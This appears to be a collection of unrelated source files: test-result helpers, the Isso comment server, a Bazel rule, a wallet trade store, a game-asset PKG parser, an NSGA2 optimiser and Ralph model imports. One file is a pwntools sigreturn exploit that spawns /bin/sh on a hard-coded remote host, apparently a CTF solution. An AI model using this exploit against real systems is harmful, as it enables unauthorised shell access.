logging.warning("There is no test name for test_id: %s",
test_result.test_id)
return None
@staticmethod
def summary_html_for_test_result(test_result):
return test_result.summary_html or ""
@staticmethod
def test_type_for_test_result(test_result):
"""Return a ResultDBTestType for test_result"""
if "blink_web_tests" in test_result.test_id:
return ResultDBTestType.BLINK
if test_result.tags:
for tag in test_result.tags:
if "gtest" in tag.key:
return ResultDBTestType.GTEST
return ResultDBTestType.OTHER
@staticmethod
def test_location_for_test_result(test_result):
"""Return test location for test_result"""
if (not test_result.test_metadata or
not test_result.test_metadata.location or
not test_result.test_metadata.location.file_name):
return None
return {
"line": test_result.test_metadata.location.line,
"file": test_result.test_metadata.location.file_name
}
@staticmethod
def get_detailed_failure_log(test_type, failure_log):
"""Gets the detailed failure log from artifact if possible
For gtest, if there is stack_trace artifact, download the content of the
artifact. Otherwise, just return summaryHTML
Argument:
test_type: ResultDBTestType
failure_log: Dictionary of {"name":..., "summary_html":...}
Returns:
A string for the detailed failure logs
"""
summary_html = failure_log["summary_html"]
if test_type != ResultDBTestType.GTEST:
return summary_html
    # We only check for the "stack_trace" artifact if "stack_trace" is present
    # in summary_html.
if "stack_trace" not in summary_html:
return summary_html
test_result_name = failure_log["name"]
artifacts = resultdb.list_artifacts(test_result_name) or []
stack_trace_artifact = next(
(a for a in artifacts if a.artifact_id == "stack_trace"), None)
if not stack_trace_artifact:
return summary_html
fetch_url = stack_trace_artifact.fetch_url
content, error = http_client_util.SendRequestToServer(
fetch_url, _FINDIT_HTTP_CLIENT)
if not error:
return content
logging.warning("Unable to fetch content from %s: %s", fetch_url, error)
return summary_html
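# --- Hedged usage sketch (not part of the original module) ---
# Builds one unexpected failing ResultDB result and feeds it through the
# wrapper above. The proto fields used (test_id, name, status, expected,
# summary_html, tags) are the same ones this module reads; the test_id and
# resource name values are placeholders.
if __name__ == "__main__":
    failing = test_result_pb2.TestResult(
        test_id="ninja://gpu:gl_tests/SharedImageTest.Basic",
        name="invocations/inv-1/tests/t/results/0",
        status=test_result_pb2.TestStatus.FAIL,
        expected=False,
        summary_html="<p>assertion failed</p>",
    )
    failing.tags.add(key="test_name", value="SharedImageTest.Basic")
    results = ResultDBTestResults([failing])
    print(results.test_type())  # OTHER here, since no gtest tag was attached
    print(results.GetClassifiedTestResults()["SharedImageTest.Basic"].total_run)  # 1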
|
the-stack_0_6216 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2012-2014 Martin Zimmermann.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Isso – a lightweight Disqus alternative
from __future__ import print_function, unicode_literals
import pkg_resources
dist = pkg_resources.get_distribution("isso")
# check if executable is `isso` and gevent is available
import sys
if sys.argv[0].startswith("isso"):
try:
import gevent.monkey
gevent.monkey.patch_all()
except ImportError:
pass
import os
import errno
import logging
import tempfile
from os.path import dirname, join
from argparse import ArgumentParser
from functools import partial, reduce
import pkg_resources
werkzeug = pkg_resources.get_distribution("werkzeug")
from itsdangerous import URLSafeTimedSerializer
from werkzeug.routing import Map
from werkzeug.exceptions import HTTPException, InternalServerError
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.local import Local, LocalManager
from werkzeug.serving import run_simple
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.middleware.profiler import ProfilerMiddleware
local = Local()
local_manager = LocalManager([local])
from isso import config, db, db_psql, migrate, wsgi, ext, views
from isso.core import ThreadedMixin, ProcessMixin, uWSGIMixin
from isso.wsgi import origin, urlsplit
from isso.utils import http, JSONRequest, html, hash
from isso.views import comments
from isso.ext.notifications import Stdout, SMTP
logging.getLogger('werkzeug').setLevel(logging.WARN)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s: %(message)s")
logger = logging.getLogger("isso")
class ProxyFixCustom(ProxyFix):
def __init__(self, app):
# This is needed for werkzeug.wsgi.get_current_url called in isso/views/comments.py
# to work properly when isso is hosted under a sub-path
# cf. https://werkzeug.palletsprojects.com/en/1.0.x/middleware/proxy_fix/
super().__init__(app, x_prefix=1)
class Isso(object):
def __init__(self, conf):
self.conf = conf
db_type = conf.get('general', 'db-type')
if db_type == 'psql':
self.db = db_psql.PSQL(conf.get('general', 'dbpath'), conf)
else:
self.db = db.SQLite3(conf.get('general', 'dbpath'), conf)
self.signer = URLSafeTimedSerializer(
self.db.preferences.get("session-key"))
self.markup = html.Markup(conf.section('markup'))
self.hasher = hash.new(conf.section("hash"))
super(Isso, self).__init__(conf)
subscribers = []
smtp_backend = False
for backend in conf.getlist("general", "notify"):
if backend == "stdout":
subscribers.append(Stdout(None))
elif backend in ("smtp", "SMTP"):
smtp_backend = True
else:
logger.warn("unknown notification backend '%s'", backend)
if smtp_backend or conf.getboolean("general", "reply-notifications"):
subscribers.append(SMTP(self))
self.signal = ext.Signal(*subscribers)
self.urls = Map()
views.Info(self)
views.Metrics(self)
comments.API(self, self.hasher)
def render(self, text):
return self.markup.render(text)
def sign(self, obj):
return self.signer.dumps(obj)
def unsign(self, obj, max_age=None):
return self.signer.loads(obj, max_age=max_age or self.conf.getint('general', 'max-age'))
def dispatch(self, request):
local.request = request
local.host = wsgi.host(request.environ)
local.origin = origin(self.conf.getiter(
"general", "host"))(request.environ)
adapter = self.urls.bind_to_environ(request.environ)
try:
handler, values = adapter.match()
except HTTPException as e:
return e
else:
try:
response = handler(request.environ, request, **values)
except HTTPException as e:
return e
except Exception:
logger.exception("%s %s", request.method,
request.environ["PATH_INFO"])
return InternalServerError()
else:
return response
def wsgi_app(self, environ, start_response):
response = self.dispatch(JSONRequest(environ))
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def make_app(conf=None, threading=True, multiprocessing=False, uwsgi=False):
if not any((threading, multiprocessing, uwsgi)):
raise RuntimeError("either set threading, multiprocessing or uwsgi")
if threading:
class App(Isso, ThreadedMixin):
pass
elif multiprocessing:
class App(Isso, ProcessMixin):
pass
else:
class App(Isso, uWSGIMixin):
pass
isso = App(conf)
# check HTTP server connection
for host in conf.getiter("general", "host"):
with http.curl('HEAD', host, '/', 5) as resp:
if resp is not None:
logger.info("connected to %s", host)
break
else:
logger.warn("unable to connect to your website, Isso will probably not "
"work correctly. Please make sure, Isso can reach your "
"website via HTTP(S).")
wrapper = [local_manager.make_middleware]
if isso.conf.getboolean("server", "profile"):
wrapper.append(partial(ProfilerMiddleware,
sort_by=("cumulative", ), restrictions=("isso/(?!lib)", 10)))
wrapper.append(partial(SharedDataMiddleware, exports={
'/js': join(dirname(__file__), 'js/'),
'/css': join(dirname(__file__), 'css/'),
'/img': join(dirname(__file__), 'img/'),
'/demo': join(dirname(__file__), 'demo/')
}))
wrapper.append(partial(wsgi.CORSMiddleware,
origin=origin(isso.conf.getiter("general", "host")),
allowed=("Origin", "Referer", "Content-Type"),
exposed=("X-Set-Cookie", "Date")))
wrapper.extend([wsgi.SubURI, ProxyFixCustom])
if werkzeug.version.startswith("0.8"):
wrapper.append(wsgi.LegacyWerkzeugMiddleware)
return reduce(lambda x, f: f(x), wrapper, isso)
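# Note (added explanation, not in the original source): the reduce() call above
# applies the wrappers in list order, each one wrapping the previous result, so
# with wrapper == [w1, w2, w3] the returned app is w3(w2(w1(isso))) and the
# last wrapper appended becomes the outermost WSGI middleware. A standalone
# sketch of the same idiom:
#
#     from functools import reduce
#     app = reduce(lambda x, f: f(x), [w1, w2, w3], isso)   # == w3(w2(w1(isso)))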
def main():
parser = ArgumentParser(description="a blog comment hosting service")
subparser = parser.add_subparsers(help="commands", dest="command")
parser.add_argument('--version', action='version',
version='%(prog)s ' + dist.version)
parser.add_argument("-c", dest="conf", default="/etc/isso.conf",
metavar="/etc/isso.conf", help="set configuration file")
imprt = subparser.add_parser('import', help="import Disqus XML export")
imprt.add_argument("dump", metavar="FILE")
imprt.add_argument("-n", "--dry-run", dest="dryrun", action="store_true",
help="perform a trial run with no changes made")
imprt.add_argument("-t", "--type", dest="type", default=None,
choices=["disqus", "wordpress", "generic"], help="export type")
imprt.add_argument("--empty-id", dest="empty_id", action="store_true",
help="workaround for weird Disqus XML exports, #135")
# run Isso as stand-alone server
subparser.add_parser("run", help="run server")
args = parser.parse_args()
conf = config.load(
join(dist.location, dist.project_name, "defaults.ini"), args.conf)
if args.command == "import":
conf.set("guard", "enabled", "off")
if args.dryrun:
xxx = tempfile.NamedTemporaryFile()
dbpath = xxx.name
else:
dbpath = conf.get("general", "dbpath")
mydb = db.SQLite3(dbpath, conf)
migrate.dispatch(args.type, mydb, args.dump, args.empty_id)
sys.exit(0)
if conf.get("general", "log-file"):
handler = logging.FileHandler(conf.get("general", "log-file"))
logger.addHandler(handler)
logging.getLogger("werkzeug").addHandler(handler)
logger.propagate = False
logging.getLogger("werkzeug").propagate = False
if not any(conf.getiter("general", "host")):
logger.error("No website(s) configured, Isso won't work.")
sys.exit(1)
if conf.get("server", "listen").startswith("http://"):
host, port, _ = urlsplit(conf.get("server", "listen"))
try:
from gevent.pywsgi import WSGIServer
WSGIServer((host, port), make_app(conf)).serve_forever()
except ImportError:
run_simple(host, port, make_app(conf), threaded=True,
use_reloader=conf.getboolean('server', 'reload'))
else:
sock = conf.get("server", "listen").partition("unix://")[2]
try:
os.unlink(sock)
except OSError as ex:
if ex.errno != errno.ENOENT:
raise
wsgi.SocketHTTPServer(sock, make_app(conf)).serve_forever()
|
the-stack_0_6217 | # Copyright 2018 The Bazel Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Coverage report generation."""
load("@bazel_tools//tools/build_defs/repo:git.bzl", "new_git_repository")
_LCOV_BUILD_FILE_CONTENT = """
filegroup(
name = "bin",
srcs = glob(["bin/**/*"]),
visibility = ["//visibility:public"],
)
"""
def bazel_coverage_report_repositories():
"""Add to the WORKSPACE external dependencies needed by the generator.
"""
if "lcov" not in native.existing_rules():
new_git_repository(
name = "lcov",
build_file_content = _LCOV_BUILD_FILE_CONTENT,
commit = "a5dd9529f9232b8d901a4d6eb9ae54cae179e5b3",
remote = "https://github.com/linux-test-project/lcov.git",
)
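# --- Hedged usage sketch (not part of the original file) ---
# A consuming WORKSPACE would typically load and call the macro above before
# declaring coverage-report targets; the repository label below is an
# assumption, not the canonical one.
#
#     load("@bazel_coverage_report//:coverage_report.bzl", "bazel_coverage_report_repositories")
#     bazel_coverage_report_repositories()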
|
the-stack_0_6218 | from typing import List, Optional
import aiosqlite
from aloe.types.blockchain_format.sized_bytes import bytes32
from aloe.types.mempool_inclusion_status import MempoolInclusionStatus
from aloe.util.db_wrapper import DBWrapper
from aloe.util.errors import Err
from aloe.util.ints import uint8, uint32
from aloe.wallet.trade_record import TradeRecord
from aloe.wallet.trading.trade_status import TradeStatus
class TradeStore:
"""
TradeStore stores trading history.
"""
db_connection: aiosqlite.Connection
cache_size: uint32
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper, cache_size: uint32 = uint32(600000)):
self = cls()
self.cache_size = cache_size
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
(
"CREATE TABLE IF NOT EXISTS trade_records("
" trade_record blob,"
" trade_id text PRIMARY KEY,"
" status int,"
" confirmed_at_index int,"
" created_at_time bigint,"
" sent int)"
)
)
await self.db_connection.execute(
"CREATE INDEX IF NOT EXISTS trade_confirmed_index on trade_records(confirmed_at_index)"
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_status on trade_records(status)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_id on trade_records(trade_id)")
await self.db_connection.commit()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM trade_records")
await cursor.close()
await self.db_connection.commit()
async def add_trade_record(self, record: TradeRecord, in_transaction) -> None:
"""
Store TradeRecord into DB
"""
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO trade_records VALUES(?, ?, ?, ?, ?, ?)",
(
bytes(record),
record.trade_id.hex(),
record.status,
record.confirmed_at_index,
record.created_at_time,
record.sent,
),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def set_status(self, trade_id: bytes32, status: TradeStatus, in_transaction: bool, index: uint32 = uint32(0)):
"""
Updates the status of the trade
"""
current: Optional[TradeRecord] = await self.get_trade_record(trade_id)
if current is None:
return None
confirmed_at_index = current.confirmed_at_index
if index != 0:
confirmed_at_index = index
tx: TradeRecord = TradeRecord(
confirmed_at_index=confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=current.sent,
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(status.value),
sent_to=current.sent_to,
)
await self.add_trade_record(tx, in_transaction)
async def increment_sent(
self,
id: bytes32,
name: str,
send_status: MempoolInclusionStatus,
err: Optional[Err],
) -> bool:
"""
Updates trade sent count (Full Node has received spend_bundle and sent ack).
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return False
sent_to = current.sent_to.copy()
err_str = err.name if err is not None else None
append_data = (name, uint8(send_status.value), err_str)
# Don't increment count if it's already sent to this peer
if append_data in sent_to:
return False
sent_to.append(append_data)
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(current.sent + 1),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=current.status,
sent_to=sent_to,
)
await self.add_trade_record(tx, False)
return True
async def set_not_sent(self, id: bytes32):
"""
Updates trade sent count to 0.
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return None
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(0),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(TradeStatus.PENDING_CONFIRM.value),
sent_to=[],
)
await self.add_trade_record(tx, False)
async def get_trade_record(self, trade_id: bytes32) -> Optional[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE trade_id=?", (trade_id.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
record = TradeRecord.from_bytes(row[0])
return record
return None
async def get_trade_record_with_status(self, status: TradeStatus) -> List[TradeRecord]:
"""
        Checks DB for TradeRecords with the given status and returns them.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE status=?", (status.value,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_not_sent(self) -> List[TradeRecord]:
"""
Returns the list of trades that have not been received by full node yet.
"""
cursor = await self.db_connection.execute(
"SELECT * from trade_records WHERE sent<? and confirmed=?",
(
4,
0,
),
)
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_unconfirmed(self) -> List[TradeRecord]:
"""
Returns the list of all trades that have not yet been confirmed.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed=?", (0,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_trades(self) -> List[TradeRecord]:
"""
Returns all stored trades.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records")
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_trades_above(self, height: uint32) -> List[TradeRecord]:
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed_at_index>?", (height,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def rollback_to_block(self, block_index):
# Delete from storage
cursor = await self.db_connection.execute(
"DELETE FROM trade_records WHERE confirmed_at_index>?", (block_index,)
)
await cursor.close()
await self.db_connection.commit()
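# --- Hedged usage sketch (not part of the original module) ---
# Minimal async wiring of TradeStore to an in-memory SQLite database. It
# assumes DBWrapper can be constructed directly from an open aiosqlite
# connection, as suggested by the create() classmethod above.
if __name__ == "__main__":
    import asyncio

    async def _demo():
        connection = await aiosqlite.connect(":memory:")
        store = await TradeStore.create(DBWrapper(connection))
        print(await store.get_all_trades())  # expected: []
        await connection.close()

    asyncio.run(_demo())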
|
the-stack_0_6220 | from pwn import *
context.arch = 'amd64'
host = '5.101.72.234'
port = 33074
execve_syscall_num = 59
bin_sh_addr = 0x402000
syscall = 0x40100B
sigret = 0x401004
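# Added explanatory notes (not in the original exploit):
# - 72 bytes of padding reach the saved return address on the stack;
# - the return address is overwritten with `sigret`, presumably a gadget that
#   issues the rt_sigreturn syscall;
# - the forged SigreturnFrame then restores registers so that rax=59 (execve),
#   rdi points at "/bin/sh" inside the binary, rsi=rdx=0 and rip lands on the
#   bare `syscall` gadget, executing execve("/bin/sh", NULL, NULL).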
if __name__ == "__main__":
    #p = process( "./main" )
    p = remote( host, port )
    payload = 'a' * 72
    payload += p64( sigret )
    sigFrame = SigreturnFrame( kernel = "amd64" )
    sigFrame.rax = execve_syscall_num
    sigFrame.rdi = bin_sh_addr
    sigFrame.rsi = 0
    sigFrame.rdx = 0
    sigFrame.rip = syscall
    payload += str( sigFrame )
    p.send( payload + "\n" )
    p.interactive()
|
the-stack_0_6222 | import dataclasses
import typing
from typing import Optional
import construct
from construct import (
Struct, PrefixedArray, Int64ul, Int32ul, Hex, Construct, Computed, Array, Tell,
Aligned, FocusedSeq, Rebuild, Seek, Pointer, Prefixed, GreedyBytes,
)
from mercury_engine_data_structures import dread_data
from mercury_engine_data_structures.construct_extensions.alignment import AlignTo
from mercury_engine_data_structures.construct_extensions.misc import Skip
from mercury_engine_data_structures.formats.base_resource import BaseResource, NameOrAssetId, resolve_asset_id, AssetId
from mercury_engine_data_structures.game_check import Game
Construct_AssetId = Hex(Int64ul)
def offset_for(con: Struct, name: str):
result = 0
for sc in con.subcons:
sc = typing.cast(Construct, sc)
if sc.name == name:
return result
result += sc.sizeof()
raise construct.ConstructError(f"Unknown field: {name}")
def header_field(field_name: str):
offset = offset_for(FileEntry, field_name)
def result(ctx):
parents = [ctx]
while "_" in parents[-1]:
parents.append(parents[-1]["_"])
start_headers = None
index = None
for c in reversed(parents):
if "_start_headers" in c:
start_headers = c["_start_headers"]
break
for c in parents:
if "_resource_index" in c:
index = c["_resource_index"]
break
if index is None or start_headers is None:
raise ValueError("Missing required context key")
return start_headers + (index * FileEntry.sizeof()) + offset
return result
FileEntry = Struct(
asset_id=Construct_AssetId,
start_offset=Int32ul,
end_offset=Int32ul,
)
PKGHeader = Struct(
header_size=Int32ul,
data_section_size=Int32ul,
file_entries=PrefixedArray(Int32ul, FileEntry),
)
PKG = Struct(
_header_size=Skip(1, Int32ul),
_data_section_size_address=Tell,
_data_section_size=Skip(1, Int32ul),
_num_files=Rebuild(Int32ul, construct.len_(construct.this.files)),
_start_headers=Tell,
_skip_headers=Seek(lambda ctx: ctx._num_files * FileEntry.sizeof(), 1),
_align=AlignTo(128),
_files_start=Tell,
_update_header_size=Pointer(
0x0,
Rebuild(Int32ul, lambda ctx: ctx._files_start - Int32ul.sizeof()),
),
files=Array(
construct.this._num_files,
Aligned(8, FocusedSeq(
"item",
_resource_index=Computed(lambda ctx: ctx["_index"]),
actual_start_offset=Tell,
start_offset=Pointer(header_field("start_offset"),
Rebuild(Int32ul, lambda ctx: ctx.actual_start_offset)),
end_offset=Pointer(header_field("end_offset"),
Rebuild(Int32ul, lambda ctx: ctx.start_offset + len(ctx.item.data))),
item_size=Computed(lambda ctx: ctx.end_offset - ctx.start_offset),
item=Struct(
asset_id=Pointer(header_field("asset_id"), Construct_AssetId),
asset_name=Computed(lambda ctx: dread_data.name_for_asset_id(ctx.asset_id)),
data=Prefixed(
Rebuild(
Computed(lambda ctx: ctx._.item_size),
construct.len_(construct.this.data),
),
GreedyBytes,
),
),
)),
),
_files_end=Tell,
_update_data_section_size=Pointer(
lambda ctx: ctx._data_section_size_address,
Rebuild(Int32ul, lambda ctx: ctx._files_end - ctx._files_start),
),
)
@dataclasses.dataclass(frozen=True)
class PkgFile:
asset_id: AssetId
data: bytes
@property
def asset_name(self) -> Optional[str]:
return dread_data.name_for_asset_id(self.asset_id)
class Pkg(BaseResource):
@classmethod
def construct_class(cls, target_game: Game) -> Construct:
return PKG
@classmethod
def parse_stream(cls, stream: typing.BinaryIO, target_game: Game) -> "Pkg":
return cls(cls.construct_class(target_game).parse_stream(stream, target_game=target_game),
target_game)
def build_stream(self, stream: typing.BinaryIO) -> bytes:
return self.construct_class(self.target_game).build_stream(self._raw, stream, target_game=self.target_game)
@property
def all_assets(self) -> typing.Iterator[PkgFile]:
for file in self.raw.files:
yield PkgFile(file.asset_id, file.data)
def get_asset(self, asset_id: NameOrAssetId) -> Optional[bytes]:
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
return file.data
return None
def replace_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
file.data = new_file
return
raise ValueError(f"Unknown asset id: {asset_id}")
def add_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
if self.get_asset(asset_id) is not None:
raise ValueError(f"Asset id already exists: {asset_id}")
self.raw.files.append(construct.Container(
asset_id=asset_id,
data=new_file,
))
def remove_asset(self, asset_id: NameOrAssetId):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
self.raw.files.remove(file)
return
raise ValueError(f"Unknown asset id: {asset_id}")
|
the-stack_0_6224 | import numpy as np
from pymoo.algorithms.genetic_algorithm import GeneticAlgorithm
from pymoo.model.individual import Individual
from pymoo.model.survival import Survival
from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover
from pymoo.operators.default_operators import set_if_none
from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation
from pymoo.operators.sampling.random_sampling import RandomSampling
from pymoo.operators.selection.tournament_selection import TournamentSelection, compare
from pymoo.util.display import disp_multi_objective
from pymoo.util.dominator import Dominator
from pymoo.util.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
class NSGA2(GeneticAlgorithm):
def __init__(self, pop_size=100, **kwargs):
# always store the individual to store rank and crowding
kwargs['individual'] = Individual(rank=np.inf, crowding=-1)
# default settings for nsga2 - not overwritten if provided as kwargs
set_if_none(kwargs, 'pop_size', pop_size)
set_if_none(kwargs, 'sampling', RandomSampling())
set_if_none(kwargs, 'selection', TournamentSelection(func_comp=binary_tournament))
set_if_none(kwargs, 'crossover', SimulatedBinaryCrossover(prob_cross=0.9, eta_cross=15))
set_if_none(kwargs, 'mutation', PolynomialMutation(prob_mut=None, eta_mut=20))
set_if_none(kwargs, 'survival', RankAndCrowdingSurvival())
set_if_none(kwargs, 'eliminate_duplicates', True)
super().__init__(**kwargs)
self.tournament_type = 'comp_by_dom_and_crowding'
self.func_display_attrs = disp_multi_objective
def binary_tournament(pop, P, algorithm, **kwargs):
if P.shape[1] != 2:
raise ValueError("Only implemented for binary tournament!")
tournament_type = algorithm.tournament_type
S = np.full(P.shape[0], np.nan)
for i in range(P.shape[0]):
a, b = P[i, 0], P[i, 1]
# if at least one solution is infeasible
if pop[a].CV > 0.0 or pop[b].CV > 0.0:
S[i] = compare(a, pop[a].CV, b, pop[b].CV, method='smaller_is_better', return_random_if_equal=True)
# both solutions are feasible
else:
if tournament_type == 'comp_by_dom_and_crowding':
rel = Dominator.get_relation(pop[a].F, pop[b].F)
if rel == 1:
S[i] = a
elif rel == -1:
S[i] = b
elif tournament_type == 'comp_by_rank_and_crowding':
S[i] = compare(a, pop[a].rank, b, pop[b].rank,
method='smaller_is_better')
else:
raise Exception("Unknown tournament type.")
# if rank or domination relation didn't make a decision compare by crowding
if np.isnan(S[i]):
S[i] = compare(a, pop[a].get("crowding"), b, pop[b].get("crowding"),
method='larger_is_better', return_random_if_equal=True)
return S[:, None].astype(np.int)
class RankAndCrowdingSurvival(Survival):
def __init__(self) -> None:
super().__init__(True)
def _do(self, pop, n_survive, D=None, **kwargs):
# get the objective space values and objects
F = pop.get("F")
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = NonDominatedSorting().do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the crowding distance of the front
crowding_of_front = calc_crowding_distance(F[front, :])
# save rank and crowding in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", crowding_of_front[j])
# current front sorted by crowding distance if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(crowding_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def calc_crowding_distance(F):
infinity = 1e+14
n_points = F.shape[0]
n_obj = F.shape[1]
if n_points <= 2:
return np.full(n_points, infinity)
else:
# sort each column and get index
I = np.argsort(F, axis=0, kind='mergesort')
# now really sort the whole array
F = F[I, np.arange(n_obj)]
# get the distance to the last element in sorted list and replace zeros with actual values
dist = np.concatenate([F, np.full((1, n_obj), np.inf)]) \
- np.concatenate([np.full((1, n_obj), -np.inf), F])
index_dist_is_zero = np.where(dist == 0)
dist_to_last = np.copy(dist)
for i, j in zip(*index_dist_is_zero):
dist_to_last[i, j] = dist_to_last[i - 1, j]
dist_to_next = np.copy(dist)
for i, j in reversed(list(zip(*index_dist_is_zero))):
dist_to_next[i, j] = dist_to_next[i + 1, j]
# normalize all the distances
norm = np.max(F, axis=0) - np.min(F, axis=0)
norm[norm == 0] = np.nan
dist_to_last, dist_to_next = dist_to_last[:-1] / norm, dist_to_next[1:] / norm
# if we divided by zero because all values in one columns are equal replace by none
dist_to_last[np.isnan(dist_to_last)] = 0.0
dist_to_next[np.isnan(dist_to_next)] = 0.0
# sum up the distance to next and last and norm by objectives - also reorder from sorted list
J = np.argsort(I, axis=0)
crowding = np.sum(dist_to_last[J, np.arange(n_obj)] + dist_to_next[J, np.arange(n_obj)], axis=1) / n_obj
# replace infinity with a large number
crowding[np.isinf(crowding)] = infinity
return crowding
|
the-stack_0_6225 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Discovery models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from ralph.discovery.models_device import (
Connection,
ConnectionType,
Database,
DatabaseType,
DeprecationKind,
Device,
DeviceEnvironment,
DeviceModel,
DeviceType,
DISK_PRODUCT_BLACKLIST,
DISK_VENDOR_BLACKLIST,
LoadBalancerMember,
LoadBalancerPool,
LoadBalancerType,
LoadBalancerVirtualServer,
MarginKind,
NetworkConnection,
ReadOnlyDevice,
SERIAL_BLACKLIST,
ServiceCatalog,
UptimeSupport,
)
from ralph.discovery.models_network import (
DataCenter,
DiscoveryQueue,
Environment,
IPAddress,
IPAlias,
Network,
NetworkKind,
NetworkTerminator,
)
from ralph.discovery.models_component import (
ComponentModel,
ComponentType,
DiskShare,
DiskShareMount,
Ethernet,
EthernetSpeed,
FibreChannel,
GenericComponent,
MAC_PREFIX_BLACKLIST,
Memory,
OperatingSystem,
Processor,
Software,
SplunkUsage,
Storage,
)
from ralph.discovery.models_history import (
DiscoveryValue,
HistoryChange,
)
ASSET_NOT_REQUIRED = (
DeviceType.rack,
DeviceType.blade_system,
DeviceType.management,
DeviceType.power_distribution_unit,
DeviceType.data_center,
DeviceType.switch_stack,
DeviceType.virtual_server,
DeviceType.cloud_server,
DeviceType.unknown
)
__all__ = [
'DataCenter',
'DiscoveryQueue',
'Environment',
'IPAddress',
'IPAlias',
'MAC_PREFIX_BLACKLIST',
'Network',
'NetworkKind',
'NetworkTerminator',
'ComponentModel',
'ComponentType',
'DiskShare',
